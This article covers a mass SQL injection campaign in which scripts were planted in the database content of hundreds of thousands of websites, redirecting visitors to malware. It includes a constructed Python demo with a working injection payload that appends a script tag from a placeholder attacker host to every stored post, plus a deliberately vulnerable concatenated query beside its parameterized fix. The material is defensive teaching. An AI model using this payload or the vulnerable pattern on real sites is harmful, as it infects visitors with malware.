
Another mass hack – MSSQL injection compromises 500,000+ web sites

A simple SQL injection flaw has resulted in more than 500,000 websites being compromised. The attackers used it to inject JavaScript into the sites' database content; pages built from that content then send visitors to other sites hosting malware that attempts to infect the visitor's machine.

This is yet another example of simple security errors resulting in mass hacks of websites. The attackers' ultimate purpose is the installation of trojans on end-user machines. The trojans are then enrolled in botnets, or used to harvest data, passwords and financial account details with keystroke loggers.

As more and more websites use database back-ends to make them faster and more dynamic, it becomes crucial to control what gets stored in, and requested from, those databases, especially where users supply content themselves, which happens all the time in discussion forums, blogs, feedback forms and other areas of dynamic websites.

Unless that data is kept out of the SQL statement itself (parameterized queries rather than string concatenation) and validated before it is saved, it is impossible to control what the database holds and therefore what the website will show to its users. This is what SQL injection is all about: exploiting weaknesses in these controls.
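The following is an added example, not code from the original article or from any of the compromised sites, showing how a single concatenated parameter lets an attacker rewrite every stored post so that it carries a script tag, and how the parameterized version of the same update stores the payload harmlessly as text. The forum table, the sample posts, the "edit post" function and the attacker host http://attacker.example are all constructed for this example; SQLite stands in for the SQL Server back-ends mentioned above, and the payload reproduces the effect described (a script tag appended to stored content), not the exact statements used in the real attack.

```python
import sqlite3

# Constructed sample data: a tiny forum table standing in for a site's database.
SAMPLE_POSTS = [
    ("Welcome", "Hello and welcome to the forum."),
    ("Rules", "Be nice. No spam."),
    ("Downtime", "Maintenance on Sunday."),
]

# Payload constructed for this example. Closing the quote early lets the
# attacker turn "SET body = '<text>'" into "SET body = '' || body || '<script>'",
# and "WHERE 1=1 --" hits every row while commenting out the site's own WHERE clause.
# The script URL is a placeholder, not a real malware host.
ATTACKER_BODY = (
    "' || body || '<script src=\"http://attacker.example/x.js\"></script>' "
    "WHERE 1=1 --"
)


def make_db():
    """Create an in-memory database seeded with the constructed sample posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, title TEXT, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO posts (author, title, body) VALUES (?, ?, ?)",
        [("alice", title, body) for title, body in SAMPLE_POSTS],
    )
    conn.commit()
    return conn


def edit_post_vulnerable(conn, post_id, author, new_body):
    """Vulnerable: user input is pasted straight into the statement text."""
    sql = (
        "UPDATE posts SET body = '" + new_body + "' "
        "WHERE id = " + str(post_id) + " AND author = '" + author + "'"
    )
    conn.execute(sql)
    conn.commit()


def edit_post_safe(conn, post_id, author, new_body):
    """Safe: the statement is fixed; values are passed as bound parameters."""
    conn.execute(
        "UPDATE posts SET body = ? WHERE id = ? AND author = ?",
        (new_body, post_id, author),
    )
    conn.commit()


def bodies(conn):
    """Return all post bodies in id order."""
    return [row[0] for row in conn.execute("SELECT body FROM posts ORDER BY id")]


def count_infected(conn):
    """Number of posts whose stored body now contains a script tag."""
    return sum(1 for body in bodies(conn) if "<script" in body)


def demo():
    """Run the same edit against both versions and report the outcome."""
    vuln = make_db()
    edit_post_vulnerable(vuln, 3, "alice", ATTACKER_BODY)   # all 3 rows rewritten
    safe = make_db()
    edit_post_safe(safe, 3, "alice", ATTACKER_BODY)         # only post 3, stored literally
    return count_infected(vuln), bodies(safe)


if __name__ == "__main__":
    infected, safe_bodies = demo()
    print("vulnerable: script tag appended to", infected, "of", len(SAMPLE_POSTS), "posts")
    print("parameterized: post 3 stores the payload as plain text:",
          safe_bodies[2] == ATTACKER_BODY)
```

Note that parameterization stops the statement from being rewritten, but the third post in the safe case still holds the literal string `<script ...>`; it must be HTML-encoded when the page is rendered, otherwise the same text becomes a stored cross-site scripting problem instead of an SQL injection one.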

References

--> F-Secure Labs: Details of the hack
--> SANS ISC Infosec forum article